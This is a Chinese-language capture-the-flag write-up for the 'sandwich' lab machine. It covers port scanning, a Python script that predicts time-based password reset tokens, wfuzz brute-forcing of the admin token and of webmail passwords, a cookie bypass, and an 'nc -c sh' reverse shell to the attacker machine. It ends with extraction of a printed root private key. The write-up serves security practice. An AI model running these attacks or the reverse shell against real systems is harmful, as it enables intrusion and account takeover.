vulnyx靶机 sandwich writeup
1.扫描
└─$ sudo nmap -sT -p- -T4 192.168.31.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 03:44 EDT
Nmap scan report for sandwich (192.168.31.114)
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:23:FE:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
└─$ sudo nmap -sTCV -O -p22,80 192.168.31.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 03:44 EDT
Nmap scan report for sandwich (192.168.31.114)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 4d:30:db:f3:d0:b5:b2:65:8d:3b:08:dc:56:2b:28:b9 (ECDSA)
|_ 256 16:9f:f2:7f:ca:5a:a2:03:65:9e:f1:09:ae:15:f7:8b (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Sandwich.nyx | Your Favorite Sandwiches!
MAC Address: 08:00:27:23:FE:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
2.web
显然需要添加域名:
192.168.31.114 sandwich.nyx
子域名fuzz:
└─$ wfuzz -c -w ~/Desktop/dict/fuzzDicts-master/subdomainDicts/dic1.txt -u 'http://disguise.hmv' -H 'HOST: FUZZ.disguise.hmv' --hh 7844
结果显示有个子域名webmail.disguise.hmv,添加到hosts文件
192.168.31.114 webmail.sandwich.nyx
测试了一下网站功能,这个站提供了这样的功能:
1.sandwich.nyx提供了登录\注册\重置密码\制作三明治的功能,且注册用户的邮箱的域名必须是sandwich.nyx,重置时会向用户的sandwich.nyx邮箱发送重置链接,用户需要登录webmail.sandwich.nyx进入个人邮箱点击重置链接即可重置密码,且重置链接的token是以uuid生成的.
2.webmail.sandwich.nyx提供了注册\登录的功能,用户可登录自己注册的邮箱查看\发送邮件
漏洞点很明显:
用户可以首先构造一个重置自己密码的请求,然后再构造一个重置admin用户密码的请求,最后再次构造一个重置自己密码的请求,这样,在用户自己的邮箱中,就会有2个重置自己密码的token,虽然看不到admin用户的重置token,但是uuid的生成随时间变化是线性,那么admin的token就在自己的两个token区间内,就可以爆破了.
注册一个用户c@sandwich.nyx,基于这个思路构造脚本:
#coding:utf8
import requests
url = 'http://sandwich.nyx/index.php'
data1 = {
'email':'c@sandwich.nyx',
'reset_action':1
}
cookies1 = {'PHPSESSID':'gkcjkvctcn3d27ucvdh7nnfll4'}
cookies2 = {'PHPSESSID':'aaaaaaaaaaaaaaaaaaaaaaaaaa'}
data2 = {
'email':'admin@sandwich.nyx',
'reset_action':1
}
requests.post(url,cookies=cookies1,data=data1)
requests.post(url,cookies=cookies2,data=data2)
requests.post(url,cookies=cookies1,data=data1)
执行脚本,在用户c的邮箱中出现了两份包含重置链接的邮件:
Sender Subject Message Date
web@sandwich.nyx Password Reset Request Dear user,
A password reset request has been made for your account. Please use the following link to reset your password:
http://sandwich.nyx/resetpassword.php?token=4ed59840-11f5-11f0-8069-08002723fefb
If you did not request this, please ignore this email. 2025-04-05 10:09:33
web@sandwich.nyx Password Reset Request Dear user,
A password reset request has been made for your account. Please use the following link to reset your password:
http://sandwich.nyx/resetpassword.php?token=4ed77afc-11f5-11f0-8069-08002723fefb
If you did not request this, please ignore this email. 2025-04-05 10:09:33
可以看到其区间范围为:
4ed59840 ~ 4ed77afc
做成字典:
└─$ cat gendict.py
for i in range(0x4ed59840,0x4ed77afc):
prefix = hex(i)[2:]
print(prefix)
python3 gendict.py > dict.txt
└─$ wc -l dict.txt
123580 dict.txt
wfuzz爆破admin用户的token
└─$ wfuzz -c -w dict.txt -u 'http://sandwich.nyx/resetpassword.php' -d 'token=FUZZ-11f5-11f0-8069-08002723fefb&new_password=admin&confirm_password=admin' -b 'PHPSESSID=gkcjkvctcn3d27ucvdh7nnfll4' --hh 420
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://sandwich.nyx/resetpassword.php
Total requests: 123580
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000075721: 200 15 L 41 W 408 Ch "4ed6c008"
Total time: 0
Processed Requests: 123580
Filtered Requests: 123579
Requests/sec.: 0
运行结束后,admin的密码已经被重置为admin了,即可登录.
web的非预期解
登录那里有个rememberme,登录普通用户并勾选rememberme,就会返回一个rememberme的cookie,其中内容为用户的邮箱,将其修改为admin@sandwich.nyx,并删除phpsessid,刷新页面,发现也进入了admin的页面.
登录admin后有个下载按钮,可以下载一份用户制作的三明治的excel表格,里面有5个用户的邮箱.
在这里花费了很多时间,没有思路,最后大佬提示,要爆破这5个用户邮箱密码(不是网站密码,网站密码可以利用漏洞重置)
└─$ wfuzz -c -w emails.txt -w ~/Desktop/dict/fuzzDicts-master/passwordDict/top3000.txt -u 'http://webmail.sandwich.nyx/login.php' -d 'email=FUZ1Z&password=FUZ2Z' --sc 302
最后获得一个邮箱用户的凭据:
matthygd_x@sandwich.nyx:qweasd
登录后在收件箱中发现admin发来的ssh登录凭据
Sender Subject Message Date
admin@sandwich.nyx SSH user password matthygd_xy:tGCD9XIP03IHpSCDdoRu 2025-03-30 19:00:14
登录后得到user.txt
matthygd_xy@sandwich:~$ cat user.txt
c158efe*********************
提权
登录ssh
matthygd_xy@sandwich:~$ id
uid=1000(matthygd_xy) gid=1000(matthygd_xy) grupos=1000(matthygd_xy),100(users)
matthygd_xy@sandwich:~$ sudo -l
Matching Defaults entries for matthygd_xy on sandwich:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User matthygd_xy may run the following commands on sandwich:
(root) NOPASSWD: /bin/chvt
matthygd_xy@sandwich:~$
/bin/chvt 是一个 Linux 系统中的命令,它的全称是 change virtual terminal,用于切换虚拟终端(VT)。
假设你当前在虚拟终端 2 上,运行以下命令:
/bin/chvt 1
这将把当前会话切换到虚拟终端 1。如果你在虚拟终端 1 上有其他用户登录,那么你将看到该用户的会话。
使用who命令可以查看当前有哪些用户在登录中:
matthygd_xy@sandwich:~$ who
ll104567 tty20 2025-04-05 09:38
matthygd_xy pts/0 2025-04-05 13:15 (192.168.31.98)
matthygd_xy@sandwich:~$ w
13:17:09 up 3:39, 2 users, load average: 0,00, 0,00, 0,00
USER TTY DESDE LOGIN@ IDLE JCPU PCPU WHAT
ll104567 tty20 - 09:38 3:39m 0.00s ? -bash
matthygd pts/0 192.168.31.98 13:15 2.00s 0.01s ? w
当普通用户matthygd_xy具有sudo执行chvt的权限,就可以切换其他登录用户的tty,进入其他用户的会话:
sudo chvt 20
在靶机界面就进入了ll104567的会话:
反弹回来一个shell
nc -c sh 192.168.31.98 1234
注意在靶机中输入有些字符是乱的,例如-键需要按/才能正常输入
└─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.31.98] from sandwich.nyx [192.168.31.114] 49942
script -qc /bin/bash /dev/null
ll104567@sandwich:~$ ^Z
zsh: suspended nc -lvp 1234
└─$ stty raw -echo;fg
[1] + continued nc -lvp 1234
reset xterm
ll104567@sandwich:~$ id
uid=1001(ll104567) gid=1001(ll104567) grupos=1001(ll104567),100(users)
ll104567@sandwich:~$ sudo -l
Matching Defaults entries for ll104567 on sandwich:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ll104567 may run the following commands on sandwich:
(ALL) NOPASSWD: /opt/game.sh
ll104567@sandwich:~$
game.sh的内容是一个猜数字的游戏
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
MAX=2000000
ATTEMPTS=$(/usr/bin/awk -v max="$MAX" 'BEGIN {printf "%d", (log(max)/log(2) + 0.999999)}')
/bin/echo "Hello! What is your name?"
read NAME
NUMBER=$(( ( RANDOM % MAX ) + 1 ))
/bin/echo "Well, $NAME, I'm thinking of a number between 1 and $MAX."
/bin/echo "You have $ATTEMPTS attempts to guess it."
ATTEMPTS_MADE=0
SECRET_FILE="/root/.ssh/id_rsa"
while [ $ATTEMPTS_MADE -lt $ATTEMPTS ]; do
/bin/echo "Try to guess:"
read GUESS
# Validate that the input is a valid number
if ! [[ "$GUESS" =~ ^[0-9]+$ ]]; then
/bin/echo "Please, enter a valid number."
continue
fi
ATTEMPTS_MADE=$((ATTEMPTS_MADE + 1))
if [ $GUESS -lt $NUMBER ]; then
/bin/echo "Your guess is too low."
elif [ $GUESS -gt $NUMBER ]; then
/bin/echo "Your guess is too high."
else
break
fi
done
if [ $GUESS -eq $NUMBER ]; then
/bin/echo "Good job, $NAME! You guessed my number in $ATTEMPTS_MADE attempts!"
/bin/echo "Here's your reward:"
/bin/cat "$SECRET_FILE"
else
/bin/echo "No, the number I was thinking of was $NUMBER."
fi
ll104567@sandwich:~$
使用二分法猜测,成功后得到root的私钥,
......
Good job, 1000000! You guessed my number in 20 attempts!
Here's your reward:
-----BEGIN OPENSSH PRIVATE KEY-----
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
...........
登录后得到root.txt
ll104567@sandwich:~$ ssh -i rootpriv.key root@localhost
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 20:14:35 2025 from 192.168.1.181
root@sandwich:~# cat root.txt
a4e728e****************
浙公网安备 33010602011771号